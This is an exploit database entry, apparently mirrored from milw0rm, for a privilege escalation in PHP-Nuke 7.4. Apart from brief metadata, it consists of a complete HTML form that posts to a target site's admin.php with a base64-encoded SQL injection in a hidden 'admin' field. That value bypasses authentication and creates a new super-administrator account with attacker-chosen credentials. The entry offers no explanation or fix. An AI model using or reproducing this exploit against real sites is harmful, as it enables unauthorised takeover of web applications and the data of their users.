[] NeoSense

PHP-Nuke 7.4 - Privilege Escalation

Author: mantra
type: webapps
platform: php
port: 
date_added: 2004-09-07 
date_updated: 2016-03-30 
verified: 1 
codes: OSVDB-9563 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comPHP-Nuke-7.4.zip

A demonstration exploit HTTP form is provided:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOME:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

# milw0rm.com [2004-09-08]